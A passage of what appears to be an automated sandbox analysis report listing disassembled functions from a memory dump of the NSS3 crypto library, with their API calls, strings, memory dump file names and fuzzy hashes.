Opcode Fuzzy Hash: 55f748033a2460254c9c3886040c91f4b96c07b6ca0c8f4cfbf9de7e7d90cbf9
Instruction Fuzzy Hash: D241C5B5900201ABEB109F65EC44A6A77E9AF0635DF044570EC18C7B12FB71E914CFAA

Function 6C6F4A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6C6EAEC0,00000A20,00000000), ref: 6C6F4A8B

Part of subcall function 6C6B0D30: calloc.MOZGLUE ref: 6C6B0D50
Part of subcall function 6C6B0D30: TlsGetValue.KERNEL32 ref: 6C6B0D6D

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6C6F4AAA

Part of subcall function 6C6AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB85
Part of subcall function 6C6AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6AFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6C6F4ABD

Part of subcall function 6C6B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C652AF5,?,?,?,?,?,6C650A1B,00000000), ref: 6C6B0F1A
Part of subcall function 6C6B0F10: malloc.MOZGLUE(00000001), ref: 6C6B0F30
Part of subcall function 6C6B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6B0F42

SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6C6F4AD6
SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6C6F4AEC

Part of subcall function 6C6AFB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB9B

SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6C6F4B49
SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6C6F4B58
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6C6F4B64
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6F4B74
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6F4B7E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
String ID:
API String ID: 476651045-0
Opcode ID: 39832552f37f736793fa3ba5c5cfeaf648d5b5d9c56dbe940a109305f2bb1314
Instruction ID: 2a92fa3a7e4f1afa1ed56cd81ea7cb3ba6e4b50c1a582d21b0463295356f2e6b
Opcode Fuzzy Hash: 39832552f37f736793fa3ba5c5cfeaf648d5b5d9c56dbe940a109305f2bb1314
Instruction Fuzzy Hash: 2631DFB56002059FD710CF65DD81AA77BB8BF09348F044569ED4AC7B02F732E906CBAA

Function 6C6789C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C67AE9B,00000000,?,?), ref: 6C6789DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C652D6B,?,?,00000000), ref: 6C6789EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C652D6B), ref: 6C678A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C652D6B,?), ref: 6C678A11

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: e9a5504af06b1ed2895932fcdeccb18966195cc90042a72c7d591851ce6efa33
Instruction ID: 67ea6b0f7175056dae18483281c0d954f47791a39ddf31bd0b685144a7ef5a44
Opcode Fuzzy Hash: e9a5504af06b1ed2895932fcdeccb18966195cc90042a72c7d591851ce6efa33
Instruction Fuzzy Hash: 4211D8F1E0030466FF2056646C81BEB35989B4675DF080836ED09B9A52F722DC19C2BF

Function 6C652E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C652CDA,?,00000000), ref: 6C652E1E

Part of subcall function 6C6AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C659003,?), ref: 6C6AFD91
Part of subcall function 6C6AFD80: PORT_Alloc_Util.NSS3(A4686C6B,?), ref: 6C6AFDA2
Part of subcall function 6C6AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C6B,?,?), ref: 6C6AFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C652E33

Part of subcall function 6C6AFD80: free.MOZGLUE(00000000,?,?), ref: 6C6AFDD1

TlsGetValue.KERNEL32 ref: 6C652E4E
EnterCriticalSection.KERNEL32(?), ref: 6C652E5E
PL_HashTableLookup.NSS3(?), ref: 6C652E71
PL_HashTableRemove.NSS3(?), ref: 6C652E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C652E96
PR_Unlock.NSS3 ref: 6C652EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C652EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C652EC5

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: efd170d8af3aeeab6f4b0bac66c91808ce3b8463d2ebb5cd5322081a530f8b33
Instruction ID: 1a478fd230a7e3a31d434cb3f422bee105df001435c047742af4dfb6d3717c75
Opcode Fuzzy Hash: efd170d8af3aeeab6f4b0bac66c91808ce3b8463d2ebb5cd5322081a530f8b33
Instruction Fuzzy Hash: 5321C272A00101A7EF012F64EC49E9A3B69EB9235DF144430ED1896711FB32D96AD7AA

Function 6C5DCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C5DB999), ref: 6C5DCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C5DB999), ref: 6C5DD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C5DB999), ref: 6C5DD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C5DB999), ref: 6C72972B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5DCFDD, 6C5DD00E, 6C5DD022, 6C5DD033, 6C729780
%s at line %d of [%.10s], xrefs: 6C5DCFEC, 6C5DD018, 6C5DD029, 6C5DD03F, 6C72978B
database corruption, xrefs: 6C5DCFE7, 6C5DD013, 6C5DD028, 6C5DD039, 6C5DD03E, 6C729786

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: b632323d577f60bbc90fabbe698381e08da74f5951062bfefe8765c7a831761e
Instruction ID: a556edb3257586714ef7d9196c33a5a27a4af73a80c9416bb13600be2b843125
Opcode Fuzzy Hash: b632323d577f60bbc90fabbe698381e08da74f5951062bfefe8765c7a831761e
Instruction Fuzzy Hash: AD613671A003108BD310CF29CD40BA7B7E5EF95318F2945ADE4889BB42E376E946C7A5

Function 6C6B4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C6B536F,00000022,?,?,00000000,?), ref: 6C6B4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C6B4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C6B4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C6B4FAE
free.MOZGLUE(?), ref: 6C6B4FC8

Strings

%s=%s, xrefs: 6C6B4F89
%s=%c%s%c, xrefs: 6C6B4FA9
oSkl", xrefs: 6C6B4DFB, 6C6B4EF4, 6C6B4EC5

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSkl"
API String ID: 2709355791-1689580949
Opcode ID: 6ea7ea6dd0346f6b9848cede1c5a9bdd60794bfb0e3f38d3571a5f76278fd49b
Instruction ID: a7f36f5b1f10008e451f27248ddb2f92d77968af8bce7bdb8b7c384813588b39
Opcode Fuzzy Hash: 6ea7ea6dd0346f6b9848cede1c5a9bdd60794bfb0e3f38d3571a5f76278fd49b
Instruction Fuzzy Hash: 6F516A71A051568BEF01CA69C4907FF7BF99F82348F188125F894B7B41D375882787A9

Function 6C6DEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C6FA4A1,?,00000000,?,00000001), ref: 6C6DEF6D

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

htonl.WSOCK32(00000000,?,6C6FA4A1,?,00000000,?,00000001), ref: 6C6DEFE4
htonl.WSOCK32(?,00000000,?,6C6FA4A1,?,00000000,?,00000001), ref: 6C6DEFF1
memcpy.VCRUNTIME140(?,?,6C6FA4A1,?,00000000,?,6C6FA4A1,?,00000000,?,00000001), ref: 6C6DF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C6FA4A1,?,00000000,?,00000001), ref: 6C6DF027

Strings

dtls13, xrefs: 6C6DEF33

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 0da85b9dc1803a85e214d7a9c19cf588ec6e28d78cbd95df8c540a723329ca5e
Instruction ID: ecd8c5e6668204c506d718739335e40a612b500885558402c1543b237c6032f5
Opcode Fuzzy Hash: 0da85b9dc1803a85e214d7a9c19cf588ec6e28d78cbd95df8c540a723329ca5e
Instruction Fuzzy Hash: B231F471A01215AFCB10DF28DC84B9AB7E4EF49348F168029EC189B751E731F915CBEA

Function 6C65AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C65AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C779500,6C653F91), ref: 6C65AFD2

Part of subcall function 6C6AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7818D0,?), ref: 6C6AB095

DER_GetInteger_Util.NSS3(?), ref: 6C65B007

Part of subcall function 6C6A6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C651666,?,6C65B00C,?), ref: 6C6A6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C65B02F
PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C65B046
PL_FreeArenaPool.NSS3 ref: 6C65B058
PL_FinishArenaPool.NSS3 ref: 6C65B060

Strings

security, xrefs: 6C65AFB8

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: b07f7e54407c8b369bd2bad0f037e4871998222b5187d0154b80b53525466e75
Instruction ID: 1fd20ca1fcb72f99faedad4d98bafb37a15329d6935a2108ad0f7f5a6510a230
Opcode Fuzzy Hash: b07f7e54407c8b369bd2bad0f037e4871998222b5187d0154b80b53525466e75
Instruction Fuzzy Hash: 893134714043009BDB108F28DC45BAA77A4AFC632CF640618F9B5ABBD1E3329519CB9F

Function 6C68ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C68ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C68AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C68AD23

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C68AD39

Strings

C_MessageDecryptFinal, xrefs: 6C68ACE1
(CK_INVALID_HANDLE), xrefs: 6C68AD1C
hSession = 0x%x, xrefs: 6C68ACFE, 6C68AD0E
nvl, xrefs: 6C68AD51, 6C68AD7B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nvl
API String ID: 332880674-330980815
Opcode ID: 5d923c4cd5bed18b10add13453d4df680dff935014f3639c1a514e10046f296f
Instruction ID: ba6031fb8856be6d5744ec77cf8d1ff17a54fd97165969be7e65d26683861df6
Opcode Fuzzy Hash: 5d923c4cd5bed18b10add13453d4df680dff935014f3639c1a514e10046f296f
Instruction Fuzzy Hash: 4621D7716021589FDB109F64DE8CFAA37B5AB4631DF044435ED09EBB92DB309908C7AE

Function 6C69CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C69CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C69CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C69D079

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: ffff5cb5bcf6bb40fcbd454a502bf5fd3d55d971741db0ef5b09d3b1ce90bf61
Instruction ID: 0b0718d146fefe746c59d6b7c5bac8e0647e81cdee7405995bb58c41f2e834b5
Opcode Fuzzy Hash: ffff5cb5bcf6bb40fcbd454a502bf5fd3d55d971741db0ef5b09d3b1ce90bf61
Instruction Fuzzy Hash: 6DC18FB1A0021A9BDB10CF24CC80BDAB7B4BF49318F1441A8E94DA7741E775EE95CF98

Function 6C652C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(480F8E0B), ref: 6C652C5D

Part of subcall function 6C6B0D30: calloc.MOZGLUE ref: 6C6B0D50
Part of subcall function 6C6B0D30: TlsGetValue.KERNEL32 ref: 6C6B0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C652C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C652CE0

Part of subcall function 6C652E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C652CDA,?,00000000), ref: 6C652E1E
Part of subcall function 6C652E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C652E33
Part of subcall function 6C652E00: TlsGetValue.KERNEL32 ref: 6C652E4E
Part of subcall function 6C652E00: EnterCriticalSection.KERNEL32(?), ref: 6C652E5E
Part of subcall function 6C652E00: PL_HashTableLookup.NSS3(?), ref: 6C652E71
Part of subcall function 6C652E00: PL_HashTableRemove.NSS3(?), ref: 6C652E84
Part of subcall function 6C652E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C652E96
Part of subcall function 6C652E00: PR_Unlock.NSS3 ref: 6C652EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C652D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C652D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C652D3F
free.MOZGLUE(00000000), ref: 6C652D73
CERT_DestroyCertificate.NSS3(?), ref: 6C652DB8
free.MOZGLUE ref: 6C652DC8

Part of subcall function 6C653E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C653EC2
Part of subcall function 6C653E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C653ED6
Part of subcall function 6C653E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C653EEE
Part of subcall function 6C653E60: PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0), ref: 6C653F02
Part of subcall function 6C653E60: PL_FreeArenaPool.NSS3 ref: 6C653F14
Part of subcall function 6C653E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C653F27

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 21bad56a28b45595a0de3e7d776560949eb925cfa8530ea0eafe33c260a0abf1
Instruction ID: ac2a680c9fc11d6d124ae6a8217de67a126df86f60f2bdb909786b74df417293
Opcode Fuzzy Hash: 21bad56a28b45595a0de3e7d776560949eb925cfa8530ea0eafe33c260a0abf1
Instruction Fuzzy Hash: 5A510F72A042129BDB00DE68DC88B6B77E5EF84308F640638EC4583610E731E8258B9A

Function 6C658980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C657310), ref: 6C6589B8

Part of subcall function 6C6B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6588A4,00000000,00000000), ref: 6C6B1228
Part of subcall function 6C6B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6B1238
Part of subcall function 6C6B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6588A4,00000000,00000000), ref: 6C6B124B
Part of subcall function 6C6B1200: PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0,00000000,00000000,00000000,?,6C6588A4,00000000,00000000), ref: 6C6B125D
Part of subcall function 6C6B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6B126F
Part of subcall function 6C6B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6B1280
Part of subcall function 6C6B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6B128E
Part of subcall function 6C6B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6B129A
Part of subcall function 6C6B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6B12A1

PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C657310), ref: 6C6589E6
PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6C658A00
CERT_CopyRDN.NSS3(00000004,00000000,6C657310,?,?,00000004,?), ref: 6C658A1B
PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6C658A74
PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6C657310), ref: 6C658AAF
PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6C657310), ref: 6C658AF3
PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6C657310), ref: 6C658B1D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
String ID:
API String ID: 3791662518-0
Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
